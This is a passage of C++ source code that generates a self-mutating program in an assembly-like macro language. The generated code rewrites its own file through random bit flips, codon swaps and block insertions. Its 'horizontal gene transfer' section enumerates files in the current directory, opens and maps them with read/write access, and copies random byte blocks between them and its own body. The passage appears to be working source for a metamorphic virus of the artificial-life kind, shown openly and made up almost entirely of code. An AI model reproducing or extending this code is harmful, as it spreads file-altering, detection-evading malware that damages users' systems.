1380file << " _push ; MapHandle" << endl; CreateAnIntron();
1381
1382CallAPI("hMapViewOfFile");
1383
1384GetAddress("MapPointer");
1385
1386file << " _saveWrtOff" << endl; CreateAnIntron();
1387file << " _nopsA" << endl; CreateAnIntron();
1388file << " _writeDWord ; mov dword[MapPointer], RegA" << endl; CreateAnIntron();
1389
1390file << " _nopsA" << endl; CreateAnIntron();
1391file << " _nopdB ; mov RegB, RegA+AminoStartInMap" << endl; CreateAnIntron();
1392
1393
1394
1395
1396file << "; ############################################################################" << endl; CreateAnIntron();
1397file << "; ############################################################################" << endl; CreateAnIntron();
1398file << "; #####" << endl; CreateAnIntron();
1399file << "; ##### Here the mutation happens: Bitmutation, exchange of codons, ..." << endl; CreateAnIntron();
1400file << "; #####" << endl; CreateAnIntron();
1401
1402file << ";ANextByteInChain:" << endl; CreateAnIntron();
1403file << " _getEIP" << endl; CreateAnIntron();
1404file << " _sub0001" << endl; CreateAnIntron();
1405file << " _sub0001" << endl; CreateAnIntron();
1406file << " _sub0001" << endl; CreateAnIntron();
1407file << " _sub0001" << endl; CreateAnIntron();
1408file << " _sub0001" << endl; CreateAnIntron();
1409file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
1410
1411file << " _nopsB" << endl; CreateAnIntron();
1412file << " _push ; push counter" << endl; CreateAnIntron();
1413
1414
1415file << "; ############################################################################" << endl; CreateAnIntron();
1416file << "; ##### Start Bit-Flip Mutation (Point-Mutation)" << endl; CreateAnIntron();
1417
1418zer0(0);
1419addnumber("12");
1420file << " _save" << endl; CreateAnIntron();
1421
1422GetAddress("RandomNumber");
1423
1424file << " _getdata" << endl; CreateAnIntron();
1425file << " _shr" << endl; CreateAnIntron();
1426file << " _push" << endl; CreateAnIntron();
1427
1428zer0(0);
1429addnumber("7");
1430file << " _save" << endl; CreateAnIntron();
1431
1432file << " _pop" << endl; CreateAnIntron();
1433file << " _and ; BC1=[RandomNumber shr 12] && 0111b" << endl; CreateAnIntron();
1434file << " _save" << endl; CreateAnIntron();
1435
1436zer0(1);
1437addnumber("1");
1438file << " _shl ; shl BC1, BC2" << endl; CreateAnIntron();
1439file << " _save" << endl; CreateAnIntron();
1440
1441file << " _pop" << endl; CreateAnIntron();
1442file << " _push" << endl; CreateAnIntron();
1443file << " _saveWrtOff ; BA1=[MapPointer]+counter" << endl; CreateAnIntron();
1444
1445file << " _getdata ; mov BC1, dword[BC1]" << endl; CreateAnIntron();
1446file << " _xor ; xor BC1, BC2" << endl; CreateAnIntron();
1447file << " _nopdB ; save changed byte" << endl; CreateAnIntron();
1448
1449
1450zer0(0);
1451addnumber("7");
1452file << " _save" << endl; CreateAnIntron();
1453
1454GetAddress("RandomNumber");
1455
1456file << " _getdata" << endl; CreateAnIntron();
1457file << " _nopdA" << endl; CreateAnIntron();
1458
1459zer0(1);
1460file << " _nopdD" << endl; CreateAnIntron();
1461
1462addnumber("VarThreshold1");
1463
1464file << " _div" << endl; CreateAnIntron();
1465file << " _nopsD" << endl; CreateAnIntron();
1466subsaved(0);
1467file << " _JnzDown" << endl;
1468file << " _nopsB ; restore" << endl;
1469file << " _writeByte ; save mutation!" << endl;
1470file << " _nopREAL" << endl;
1471file << " _nopREAL" << endl;
1472
1473
1474file << "; ##### Finished Bit-Flip Mutation (Point-Mutation)" << endl; CreateAnIntron();
1475file << "; ############################################################################" << endl; CreateAnIntron();
1476
1477
1478CalcNewRandNumberAndSaveIt();
1479
1480
1481file << "; ############################################################################" << endl; CreateAnIntron();
1482file << "; ##### Start codons exchange" << endl; CreateAnIntron();
1483
1484
1485GetAddress("xchgBuffer");
1486file << " _saveWrtOff" << endl; CreateAnIntron();
1487
1488file << " _pop" << endl; CreateAnIntron();
1489file << " _push ; get counter" << endl; CreateAnIntron();
1490
1491file << " _getdata" << endl; CreateAnIntron();
1492file << " _writeDWord ; xchgBuffer=dword[counter]" << endl; CreateAnIntron();
1493
1494file << " _pop" << endl; CreateAnIntron();
1495file << " _push ; get counter" << endl; CreateAnIntron();
1496file << " _saveWrtOff ; save destination for potential writing" << endl; CreateAnIntron();
1497
1498addnumber("4");
1499file << " _getdata" << endl; CreateAnIntron();
1500file << " _nopdB ; RegB=dword[counter+4]" << endl; CreateAnIntron();
1501
1502
1503zer0(0);
1504addnumber("7");
1505file << " _save" << endl; CreateAnIntron();
1506GetAddress("RandomNumber");
1507
1508file << " _getdata" << endl; CreateAnIntron();
1509file << " _nopdA" << endl; CreateAnIntron();
1510
1511zer0(1);
1512file << " _nopdD" << endl; CreateAnIntron();
1513
1514addnumber("xchgThreshold1");
1515
1516file << " _div" << endl; CreateAnIntron();
1517file << " _nopsD" << endl; CreateAnIntron();
1518subsaved(0);
1519
1520file << " _JnzDown ; if not zero, dont exchange codons" << endl;
1521file << " _nopsB ; restore" << endl;
1522file << " _writeDWord ; save mutation!" << endl;
1523file << " _nopREAL" << endl;
1524file << " _nopREAL" << endl;
1525
1526GetAddress("xchgBuffer");
1527file << " _getdata" << endl; CreateAnIntron();
1528
1529file << " _nopdB" << endl; CreateAnIntron();
1530
1531file << " _pop" << endl; CreateAnIntron();
1532file << " _push ; get counter" << endl; CreateAnIntron();
1533addnumber("4");
1534file << " _saveWrtOff" << endl; CreateAnIntron();
1535
1536
1537zer0(0);
1538addnumber("7");
1539file << " _save" << endl; CreateAnIntron();
1540GetAddress("RandomNumber");
1541
1542file << " _getdata" << endl; CreateAnIntron();
1543file << " _nopdA" << endl; CreateAnIntron();
1544
1545zer0(1);
1546file << " _nopdD" << endl; CreateAnIntron();
1547
1548addnumber("xchgThreshold1");
1549
1550file << " _div" << endl; CreateAnIntron();
1551file << " _nopsD" << endl; CreateAnIntron();
1552subsaved(0);
1553
1554file << " _JnzDown ; if not zero, dont exchange codons" << endl;
1555file << " _nopsB ; restore" << endl;
1556file << " _writeDWord ; save mutation!" << endl;
1557file << " _nopREAL" << endl;
1558file << " _nopREAL" << endl;
1559
1560
1561
1562CalcNewRandNumberAndSaveIt();
1563
1564
1565file << " _pop" << endl; CreateAnIntron();
1566addnumber("1");
1567file << " _nopdB ; inc counter" << endl; CreateAnIntron();
1568
1569GetAddress("MapPointer");
1570file << " _getdata" << endl; CreateAnIntron();
1571file << " _save" << endl; CreateAnIntron();
1572zer0(1);
1573
1574GetAddress("FileSize");
1575file << " _getdata" << endl; CreateAnIntron();
1576
1577file << " _sub0001" << endl; CreateAnIntron();
1578file << " _sub0001" << endl; CreateAnIntron();
1579file << " _sub0001" << endl; CreateAnIntron();
1580file << " _sub0001" << endl; CreateAnIntron();
1581file << " _sub0001" << endl; CreateAnIntron();
1582file << " _sub0001" << endl; CreateAnIntron();
1583file << " _sub0001" << endl; CreateAnIntron();
1584file << " _sub0001" << endl; CreateAnIntron();
1585file << " _sub0001 ; Dont mutate the last 9 bytes because of xchg problems" << endl; CreateAnIntron();
1586
1587file << " _addsaved" << endl; CreateAnIntron();
1588file << " _save ; mov save, [MapPointer]+GenomEndInMap" << endl; CreateAnIntron();
1589
1590file << " _nopsB" << endl; CreateAnIntron();
1591subsaved(0);
1592file << " _JnzUp ; jnz esi" << endl; CreateAnIntron();
1593file << "; loop ANextByteInChain" << endl; CreateAnIntron();
1594
1595file << "; ##### Finished codons exchange" << endl; CreateAnIntron();
1596file << "; ############################################################################" << endl; CreateAnIntron();
1597
1598GetAddress("RandomNumber");
1599
1600file << " _getdata" << endl; CreateAnIntron();
1601file << " _nopdA" << endl; CreateAnIntron();
1602zer0(0);
1603file << " _nopdD" << endl; CreateAnIntron();
1604
1605addnumber("InsertThreshold1");
1606
1607file << " _div" << endl; CreateAnIntron();
1608file << " _nopsD" << endl; CreateAnIntron();
1609
1610file << " _push ; Save Result = (rand() % InsertThreshold1)" << endl; CreateAnIntron();
1611
1612CalcNewRandNumberAndSaveIt();
1613
1614
1615
1616
1617
1618GetAddress("RandomNumber");
1619file << " _getdata" << endl; CreateAnIntron();
1620file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1621
1622zer0(0);
1623file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1624
1625GetAddress("FileSize");
1626file << " _getdata" << endl; CreateAnIntron();
1627file << " _nopdB ; RegB=FileSize" << endl; CreateAnIntron();
1628
1629file << " _div ; div BC1 <- RegD = rand() % FileSize = nBeforeIns" << endl; CreateAnIntron();
1630
1631GetAddress("InsStart");
1632file << " _saveWrtOff" << endl; CreateAnIntron();
1633
1634file << " _nopsD ; BC1=nBeforeIns" << endl; CreateAnIntron();
1635file << " _save ; BC2=nBeforeIns" << endl; CreateAnIntron();
1636
1637file << " _nopsB ; BC1=FileSize" << endl; CreateAnIntron();
1638subsaved(1);
1639file << " _nopdB ; RegB=(FileSize-nBeforeIns)" << endl; CreateAnIntron();
1640
1641GetAddress("MapPointer");
1642file << " _getdata ; BC1=MapPoint" << endl; CreateAnIntron();
1643file << " _addsaved ; BC1=MapPoint + nBeforeIns = InsStart" << endl; CreateAnIntron();
1644
1645file << " _writeDWord ; !!! InsStart=MapPoint + nBeforeIns" << endl; CreateAnIntron();
1646file << " _push" << endl; CreateAnIntron();
1647
1648
1649
1650CalcNewRandNumberAndSaveIt();
1651
1652GetAddress("nBlockSize");
1653file << " _saveWrtOff" << endl; CreateAnIntron();
1654
1655GetAddress("RandomNumber");
1656file << " _getdata" << endl; CreateAnIntron();
1657file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1658
1659zer0(0);
1660file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1661addnumber("32");
1662
1663file << " _div ; div BC1 <- RegD = rand() % 32 = nBlockSize" << endl; CreateAnIntron();
1664
1665
1666
1667file << " _nopsD ; BC1=nBlockSize" << endl; CreateAnIntron();
1668addnumber("1");
1669file << " _writeDWord ; !!! nBlockSize" << endl; CreateAnIntron();
1670
1671file << " _save ; BC2=nBlockSize" << endl; CreateAnIntron();
1672
1673GetAddress("InsEnd");
1674file << " _saveWrtOff" << endl; CreateAnIntron();
1675
1676file << " _pop ; BC1 = InsStart" << endl; CreateAnIntron();
1677file << " _addsaved ; BC1 = InsStart + nBlockSize = InsEnd" << endl; CreateAnIntron();
1678
1679file << " _writeDWord ; !!! InsEnd" << endl; CreateAnIntron();
1680
1681
1682
1683CalcNewRandNumberAndSaveIt();
1684
1685GetAddress("nByteBlockToMov");
1686file << " _saveWrtOff" << endl; CreateAnIntron();
1687
1688GetAddress("RandomNumber");
1689file << " _getdata" << endl; CreateAnIntron();
1690file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1691
1692zer0(0);
1693file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1694
1695file << " _nopsB ; BC1=(FileSize-nBeforeIns)" << endl; CreateAnIntron();
1696
1697file << " _div" << endl; CreateAnIntron();
1698
1699file << " _nopsD ; BC1=nByteBlockToMov" << endl; CreateAnIntron();
1700addnumber("1");
1701file << " _writeDWord ; !!! nByteBlockToMov" << endl; CreateAnIntron();
1702
1703GetAddress("InsStart");
1704file << " _getdata" << endl; CreateAnIntron();
1705file << " _nopdA ; RegA=InsStart" << endl; CreateAnIntron();
1706
1707GetAddress("InsEnd");
1708file << " _getdata" << endl; CreateAnIntron();
1709file << " _nopdB ; RegB=InsEnd" << endl; CreateAnIntron();
1710
1711GetAddress("nByteBlockToMov");
1712file << " _getdata" << endl; CreateAnIntron();
1713file << " _nopdD ; RegD=nByteBlockToMov=c" << endl; CreateAnIntron();
1714
1715file << "; do" << endl; CreateAnIntron();
1716file << " _getEIP" << endl; CreateAnIntron();
1717file << " _sub0001" << endl; CreateAnIntron();
1718file << " _sub0001" << endl; CreateAnIntron();
1719file << " _sub0001" << endl; CreateAnIntron();
1720file << " _sub0001" << endl; CreateAnIntron();
1721file << " _sub0001" << endl; CreateAnIntron();
1722file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
1723
1724file << " _nopsD ; BC1=c" << endl; CreateAnIntron();
1725file << " _save ; BC2=c" << endl; CreateAnIntron();
1726
1727file << " _nopsB ; BC1=InsEnd" << endl; CreateAnIntron();
1728file << " _addsaved ; BC1=InsEnd+c" << endl; CreateAnIntron();
1729file << " _saveWrtOff ; BA1=InsEnd+c" << endl; CreateAnIntron();
1730
1731
1732file << " _pop ; If BC1=0: mutate" << endl; CreateAnIntron();
1733file << " _push" << endl; CreateAnIntron();
1734addnumber("1");
1735file << " _sub0001 ; Get the zer0 flag" << endl; CreateAnIntron();
1736file << " _JnzDown" << endl;
1737file << " _nopsA ; BC1=InsStart" << endl;
1738file << " _addsaved ; BC1=InsStart+c" << endl;
1739file << " _getdata ; BC1=*(InsStart+c)" << endl;
1740file << " _writeByte ; *(InsEnd+c)==*(InsStart+c)" << endl;
1741
1742file << " _nopsD" << endl; CreateAnIntron();
1743file << " _sub0001" << endl; CreateAnIntron();
1744file << " _nopdD ; RegD=c-1" << endl; CreateAnIntron();
1745
1746file << " _JnzUp" << endl; CreateAnIntron();
1747file << "; while --c" << endl; CreateAnIntron();
1748
1749file << "; Already set:" << endl; CreateAnIntron();
1750GetAddress("InsStart");
1751file << "; _getdata" << endl; CreateAnIntron();
1752file << "; _nopdA ; RegA=InsStart" << endl; CreateAnIntron();
1753
1754zer0(0);
1755addnumber("144");
1756file << " _nopdB" << endl; CreateAnIntron();
1757
1758GetAddress("nBlockSize");
1759file << " _getdata" << endl; CreateAnIntron();
1760file << " _nopdD ; RegD=nBlockSize=c" << endl; CreateAnIntron();
1761
1762
1763file << "; do" << endl; CreateAnIntron();
1764file << " _getEIP" << endl; CreateAnIntron();
1765file << " _sub0001" << endl; CreateAnIntron();
1766file << " _sub0001" << endl; CreateAnIntron();
1767file << " _sub0001" << endl; CreateAnIntron();
1768file << " _sub0001" << endl; CreateAnIntron();
1769file << " _sub0001" << endl; CreateAnIntron();
1770file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
1771
1772file << " _nopsD ; BC1=c" << endl; CreateAnIntron();
1773file << " _save ; BC2=c" << endl; CreateAnIntron();
1774
1775file << " _nopsA ; BC1=InsStart" << endl; CreateAnIntron();
1776file << " _addsaved ; BC1=InsStart+c" << endl; CreateAnIntron();
1777file << " _saveWrtOff ; BA1=InsStart+c" << endl; CreateAnIntron();
1778
1779
1780
1781file << " _pop ; If BC1=0: mutate" << endl; CreateAnIntron();
1782file << " _push" << endl; CreateAnIntron();
1783addnumber("1");
1784file << " _sub0001 ; Get the zer0 flag" << endl; CreateAnIntron();
1785file << " _JnzDown" << endl;
1786file << " _nopREAL" << endl;
1787file << " _nopREAL" << endl;
1788file << " _nopsB" << endl;
1789file << " _writeByte ; *(InsStart+c)==_nopREAL" << endl;
1790
1791file << " _nopsD" << endl; CreateAnIntron();
1792file << " _sub0001" << endl; CreateAnIntron();
1793file << " _nopdD ; RegD=c-1" << endl; CreateAnIntron();
1794
1795file << " _JnzUp" << endl; CreateAnIntron();
1796file << "; while --c" << endl; CreateAnIntron();
1797
1798file << " _pop ; remove (rand() % InsertThreshold1) from Stack" << endl; CreateAnIntron();
1799
1800
1801
1802zer0(0);
1803addnumber("((HGTEnd1-HGTStart1)*8)");
1804
1805file << " _save" << endl; CreateAnIntron();
1806
1807
1808file << " _getEIP" << endl; CreateAnIntron();
1809
1810file << " HGTStart1:" << endl; CreateAnIntron();
1811addnumber("3");
1812file << " _addsaved" << endl; CreateAnIntron();
1813file << " _nopdB ; Save Addresse in RegB" << endl; CreateAnIntron();
1814
1815
1816CalcNewRandNumberAndSaveIt();
1817
1818GetAddress("RandomNumber");
1819file << " _getdata" << endl; CreateAnIntron();
1820file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1821
1822zer0(0);
1823file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1824addnumber("HGTThreshold1");
1825
1826file << " _div ; div BC1 <- RegD = rand() % HGTThreshold1" << endl; CreateAnIntron();
1827
1828file << " _nopsD" << endl; CreateAnIntron();
1829file << " _save" << endl; CreateAnIntron();
1830file << " _and ; Is zero?" << endl; CreateAnIntron();
1831
1832file << " _JnzDown ; Simulate a JzDown" << endl;
1833
1834file << " _nopREAL ; BC1=0" << endl;
1835file << " _nopREAL" << endl;
1836file << " _add0001" << endl;
1837file << " _JnzDown" << endl;
1838
1839
1840file << " _nopsB ; BC1!=0" << endl;
1841file << " _call ; jmp over HGT" << endl;
1842file << " _nopREAL" << endl;
1843file << " _nopREAL" << endl;
1844
1845
1846GetAddress("HGT_searchmask");
1847file << " _saveWrtOff" << endl; CreateAnIntron();
1848zer0(0);
1849addnumber("0x002A2E2A");
1850file << " _writeDWord" << endl; CreateAnIntron();
1851
1852
1853GetAddress("WIN32_FIND_DATA_struct");
1854file << " _push" << endl; CreateAnIntron();
1855GetAddress("HGT_searchmask");
1856file << " _push" << endl; CreateAnIntron();
1857CallAPI("hFindFirstFileA");
1858
1859
1860GetAddress("HGT_FFHandle");
1861file << " _saveWrtOff" << endl; CreateAnIntron();
1862file << " _nopsA" << endl; CreateAnIntron();
1863file << " _writeDWord ; Save FindHandle" << endl; CreateAnIntron();
1864
1865file << " _getEIP" << endl; CreateAnIntron();
1866file << " _sub0001" << endl; CreateAnIntron();
1867file << " _sub0001" << endl; CreateAnIntron();
1868file << " _sub0001" << endl; CreateAnIntron();
1869file << " _sub0001" << endl; CreateAnIntron();
1870file << " _sub0001" << endl; CreateAnIntron();
1871file << " _saveJmpOff ; Start of the loop" << endl; CreateAnIntron();
1872
1873
1874file << " ; Calculate the call addresse if the file is not ok" << endl; CreateAnIntron();
1875zer0(0);
1876addnumber("((HGTFileEnd1-HGTFileStart1)*8)");
1877file << " _save" << endl; CreateAnIntron();
1878
1879file << " _getEIP" << endl; CreateAnIntron();
1880
1881file << " HGTFileStart1:" << endl; CreateAnIntron();
1882addnumber("3");
1883file << " _addsaved" << endl; CreateAnIntron();
1884file << " _push ; Save Addresse on Stack" << endl; CreateAnIntron();
1885
1886GetAddress("HGTFileHandle");
1887file << " ; be Closed later in any case," << endl; CreateAnIntron();
1888file << " ; except for [Handle]==0x0" << endl; CreateAnIntron();
1889file << " _saveWrtOff" << endl; CreateAnIntron();
1890zer0(0);
1891file << " _writeDWord" << endl; CreateAnIntron();
1892
1893GetAddress("HGTMapHandle");
1894file << " _saveWrtOff" << endl; CreateAnIntron();
1895zer0(0);
1896file << " _writeDWord" << endl; CreateAnIntron();
1897
1898GetAddress("HGTDidInsert");
1899file << " _saveWrtOff" << endl; CreateAnIntron();
1900zer0(0);
1901file << " _sub0001" << endl; CreateAnIntron();
1902file << " _writeDWord" << endl; CreateAnIntron();
1903
1904zer0(0);
1905addnumber("FILE_ATTRIBUTE_DIRECTORY");
1906file << " _save" << endl; CreateAnIntron();
1907GetAddress("WIN32_FIND_DATA_dwFileAttributes");
1908file << " _getdata" << endl; CreateAnIntron();
1909subsaved(0);
1910
1911file << " _JnzDown ; Simulate a JzDown" << endl;
1912file << " _pop ; BC1=0" << endl;
1913file << " _push" << endl;
1914file << " _call ; If directory -> Do not open..." << endl;
1915file << " _nopREAL" << endl;
1916
1917
1918CalcNewRandNumberAndSaveIt();
1919
1920GetAddress("RandomNumber");
1921file << " _getdata" << endl; CreateAnIntron();
1922file << " _nopdA" << endl; CreateAnIntron();
1923
1924zer0(0);
1925file << " _nopdD" << endl; CreateAnIntron();
1926
1927addnumber("5");
1928file << " _div" << endl; CreateAnIntron();
1929
1930file << " _nopsD" << endl; CreateAnIntron();
1931file << " _save" << endl; CreateAnIntron();
1932file << " _and" << endl; CreateAnIntron();
1933
1934file << " _JnzDown ; Simulate a JzDown" << endl;
1935
1936file << " _nopREAL ; BC=0" << endl;
1937file << " _nopREAL" << endl;
1938file << " _add0001" << endl;
1939file << " _JnzDown" << endl;
1940
1941file << " _pop ; BC!=0" << endl;
1942file << " _push" << endl;
1943file << " _call ; Not this file..." << endl;
1944file << " _nopREAL" << endl;
1945
1946
1947file << " ; OPEN FILE NOW" << endl; CreateAnIntron();
1948zer0(0);
1949file << " _push" << endl; CreateAnIntron();
1950file << " _push" << endl; CreateAnIntron();
1951addnumber("3");
1952file << " _push" << endl; CreateAnIntron();
1953zer0(0);
1954file << " _push" << endl; CreateAnIntron();
1955addnumber("1");
1956file << " _push" << endl; CreateAnIntron();
1957file << " _sub0001" << endl; CreateAnIntron();
1958addnumber("0xC0000000");
1959file << " _push" << endl; CreateAnIntron();
1960GetAddress("WIN32_FIND_DATA_cFileName");
1961file << " _push" << endl; CreateAnIntron();
1962CallAPI("hCreateFileA");
1963
1964GetAddress("HGTFileHandle");
1965file << " _saveWrtOff" << endl; CreateAnIntron();
1966file << " _nopsA" << endl; CreateAnIntron();
1967file << " _writeDWord ; mov dword[HGTFileHandle], RegA" << endl; CreateAnIntron();
1968
1969file << " _save" << endl; CreateAnIntron();
1970
1971file << " _nopsA" << endl; CreateAnIntron();
1972addnumber("1");
1973file << " ; -> if error: BC1=0" << endl; CreateAnIntron();
1974
1975file << " _JnzDown ; Simulate a JzDown" << endl;
1976file << " _pop ; BC1=0" << endl;
1977file << " _push" << endl;
1978file << " _call ; If INVALID_HANDLE_VALUE -> Do not open..." << endl;
1979file << " _nopREAL" << endl;
1980
1981GetAddress("HGTFileSize");
1982
1983file << " _push" << endl; CreateAnIntron();
1984zer0(1);
1985file << " _addsaved" << endl; CreateAnIntron();
1986file << " _push" << endl; CreateAnIntron();
1987CallAPI("hGetFileSize");
1988
1989GetAddress("HGTFileSize");
1990file << " _saveWrtOff" << endl; CreateAnIntron();
1991file << " _nopsA" << endl; CreateAnIntron();
1992file << " _writeDWord ; mov dword[HGTFileSize], RegA" << endl; CreateAnIntron();
1993
1994zer0(1);
1995file << " _push" << endl; CreateAnIntron();
1996file << " _addsaved" << endl; CreateAnIntron();
1997file << " _push" << endl; CreateAnIntron();
1998zer0(0);
1999file << " _push" << endl; CreateAnIntron();
2000addnumber("4");
2001file << " _push" << endl; CreateAnIntron();
2002zer0(0);
2003file << " _push" << endl; CreateAnIntron();
2004GetAddress("HGTFileHandle");
2005file << " _getdata" << endl; CreateAnIntron();
2006file << " _push" << endl; CreateAnIntron();
2007CallAPI("hCreateFileMappingA");
2008
2009
2010GetAddress("HGTMapHandle");
2011
2012file << " _saveWrtOff" << endl; CreateAnIntron();
2013file << " _nopsA" << endl; CreateAnIntron();
2014file << " _writeDWord ; mov dword[HGTMapHandle], RegA" << endl; CreateAnIntron();
2015
2016file << " _save" << endl; CreateAnIntron();
2017
2018file << " _nopsA" << endl; CreateAnIntron();
2019file << " _save" << endl; CreateAnIntron();
2020file << " _and" << endl; CreateAnIntron();
2021file << " _JnzDown ; Simulate a JzDown" << endl;
2022
2023file << " _pop ; BC1=0" << endl;
2024file << " _push" << endl;
2025file << " _call ; If NULL -> Do not open..." << endl;
2026file << " _nopREAL" << endl;
2027
2028GetAddress("HGTFileSize");
2029
2030file << " _getdata" << endl; CreateAnIntron();
2031file << " _push ; [HGTFileSize]" << endl; CreateAnIntron();
2032zer0(1);
2033file << " _push ; 0" << endl; CreateAnIntron();
2034file << " _push ; 0" << endl; CreateAnIntron();
2035addnumber("2");
2036file << " _push" << endl; CreateAnIntron();
2037zer0(1);
2038file << " _addsaved" << endl; CreateAnIntron();
2039file << " _push ; MapHandle" << endl; CreateAnIntron();
2040
2041CallAPI("hMapViewOfFile");
2042
2043GetAddress("HGTMapPointer");
2044
2045file << " _saveWrtOff" << endl; CreateAnIntron();
2046file << " _nopsA" << endl; CreateAnIntron();
2047file << " _writeDWord ; mov dword[HGTMapPointer], RegA" << endl; CreateAnIntron();
2048
2049file << " _nopsA" << endl; CreateAnIntron();
2050file << " _save" << endl; CreateAnIntron();
2051file << " _and" << endl; CreateAnIntron();
2052file << " _JnzDown ; Simulate a JzDown" << endl;
2053file << " _pop ; BC1=0" << endl;
2054file << " _push" << endl;
2055file << " _call ; If NULL -> Do not open..." << endl;
2056file << " _nopREAL" << endl;
2057
2058
2059CalcNewRandNumberAndSaveIt();
2060
2061GetAddress("RandomNumber");
2062file << " _getdata" << endl; CreateAnIntron();
2063file << " _nopdA" << endl; CreateAnIntron();
2064
2065zer0(0);
2066file << " _nopdD" << endl; CreateAnIntron();
2067
2068GetAddress("HGTFileSize");
2069file << " _getdata" << endl; CreateAnIntron();
2070
2071file << " _div" << endl; CreateAnIntron();
2072
2073file << " _nopsD" << endl; CreateAnIntron();
2074file << " _save" << endl; CreateAnIntron();
2075
2076GetAddress("HGTMapPointer");
2077file << " _getdata" << endl; CreateAnIntron();
2078
2079file << " _addsaved" << endl; CreateAnIntron();
2080
2081file << " _push ; Start in sourcefile" << endl; CreateAnIntron();
2082
2083
2084CalcNewRandNumberAndSaveIt();
2085
2086GetAddress("RandomNumber");
2087file << " _getdata" << endl; CreateAnIntron();
2088file << " _nopdA" << endl; CreateAnIntron();
2089
2090zer0(0);
2091file << " _nopdD" << endl; CreateAnIntron();
2092
2093GetAddress("FileSize");
2094file << " _getdata" << endl; CreateAnIntron();
2095
2096file << " _div" << endl; CreateAnIntron();
2097
2098file << " _nopsD" << endl; CreateAnIntron();
2099file << " _save" << endl; CreateAnIntron();
2100
2101GetAddress("MapPointer");
2102file << " _getdata" << endl; CreateAnIntron();
2103file << " _addsaved" << endl; CreateAnIntron();
2104
2105file << " _push ; Start in my file" << endl; CreateAnIntron();
2106
2107
2108CalcNewRandNumberAndSaveIt();
2109
2110GetAddress("RandomNumber");
2111file << " _getdata" << endl; CreateAnIntron();
2112file << " _nopdA" << endl; CreateAnIntron();
2113
2114zer0(0);
2115file << " _nopdD" << endl; CreateAnIntron();
2116
2117addnumber("11");
2118
2119file << " _div" << endl; CreateAnIntron();
2120file << " _nopsD" << endl; CreateAnIntron();
2121addnumber("1");
2122file << " _nopdD" << endl; CreateAnIntron();
2123
2124file << " ; Size in RegD" << endl; CreateAnIntron();
2125
2126
2127file << " _pop ; Start in my file" << endl; CreateAnIntron();
2128file << " _nopdB" << endl; CreateAnIntron();
2129
2130
2131file << " _pop ; Start in victim file" << endl; CreateAnIntron();
2132file << " _nopdA" << endl; CreateAnIntron();
2133
2134file << " _pushall" << endl; CreateAnIntron();
2135file << " _getEIP" << endl; CreateAnIntron();
2136file << " _sub0001" << endl; CreateAnIntron();
2137file << " _sub0001" << endl; CreateAnIntron();
2138file << " _sub0001" << endl; CreateAnIntron();
2139file << " _sub0001" << endl; CreateAnIntron();
2140file << " _sub0001" << endl; CreateAnIntron();
2141
2142file << " _saveJmpOff ; Save everything, especially the old BA2" << endl; CreateAnIntron();
2143
2144file << " _nopsB" << endl; CreateAnIntron();
2145file << " _saveWrtOff" << endl; CreateAnIntron();
2146addnumber("1");
2147file << " _nopdB" << endl; CreateAnIntron();
2148
2149file << " _nopsA" << endl; CreateAnIntron();
2150addnumber("1");
2151file << " _nopdA" << endl; CreateAnIntron();
2152file << " _sub0001" << endl; CreateAnIntron();
2153file << " _getdata" << endl; CreateAnIntron();
2154
2155file << " _writeByte" << endl; CreateAnIntron();
2156
2157file << " _nopsD" << endl; CreateAnIntron();
2158file << " _sub0001" << endl; CreateAnIntron();
2159file << " _nopdD" << endl; CreateAnIntron();
2160
2161file << " _JnzUp" << endl; CreateAnIntron();
2162file << " _popall ; Get old BA2 again" << endl; CreateAnIntron();
2163
2164GetAddress("HGTDidInsert");
2165file << " _saveWrtOff" << endl; CreateAnIntron();
2166zer0(0);
2167file << " _writeDWord" << endl; CreateAnIntron();
2168
2169
2170file << " _push ; trash" << endl; CreateAnIntron();
2171
2172file << " HGTFileEnd1:" << endl; CreateAnIntron();
2173file << " _pop ; from call" << endl; CreateAnIntron();
2174file << " _pop ; saved address" << endl; CreateAnIntron();
2175
2176GetAddress("HGTMapPointer");
2177file << " _getdata" << endl; CreateAnIntron();
2178file << " _push" << endl; CreateAnIntron();
2179CallAPI("hUnmapViewOfFile");
2180
2181
2182file << " _getDO" << endl; CreateAnIntron();
2183addnumber("(hCloseHandle-DataOffset)");
2184file << " _getdata" << endl; CreateAnIntron();
2185file << " _nopdA ; Save API in RegA" << endl; CreateAnIntron();
2186
2187GetAddress("HGTMapHandle");
2188file << " _getdata" << endl; CreateAnIntron();
2189file << " _push" << endl; CreateAnIntron();
2190file << " _save" << endl; CreateAnIntron();
2191file << " _and" << endl; CreateAnIntron();
2192
2193file << " _JnzDown" << endl;
2194file << " ; BC==0" << endl;
2195file << " _nopREAL" << endl;
2196file << " _nopREAL" << endl;
2197file << " _add0001" << endl;
2198file << " _JnzDown" << endl;
2199
2200file << " ; BC!=0" << endl;
2201file << " _nopsA ; get API offset" << endl;
2202file << " _call ; call CloseHandle, dword[HGTMapHandle]" << endl;
2203file << " _push ; Trash" << endl;
2204file << " _nopREAL" << endl;
2205
2206
2207file << " _pop ; remove trash" << endl; CreateAnIntron();
2208
2209file << " _getDO" << endl; CreateAnIntron();
2210addnumber("(hCloseHandle-DataOffset)");
2211file << " _getdata" << endl; CreateAnIntron();
2212file << " _nopdA ; Save API in RegA" << endl; CreateAnIntron();
2213
2214GetAddress("HGTFileHandle");
2215file << " _getdata" << endl; CreateAnIntron();
2216file << " _push" << endl; CreateAnIntron();
2217file << " _save" << endl; CreateAnIntron();
2218file << " _and" << endl; CreateAnIntron();
2219
2220file << " _JnzDown" << endl;
2221file << " ; BC==0" << endl;
2222file << " _nopREAL" << endl;
2223file << " _nopREAL" << endl;
2224file << " _add0001" << endl;
2225file << " _JnzDown" << endl;
2226
2227file << " ; BC!=0" << endl;
2228file << " _nopsA ; get API offset" << endl;
2229file << " _call ; call CloseHandle, dword[HGTFileHandle]" << endl;
2230file << " _push ; Trash" << endl;
2231file << " _nopREAL" << endl;
2232
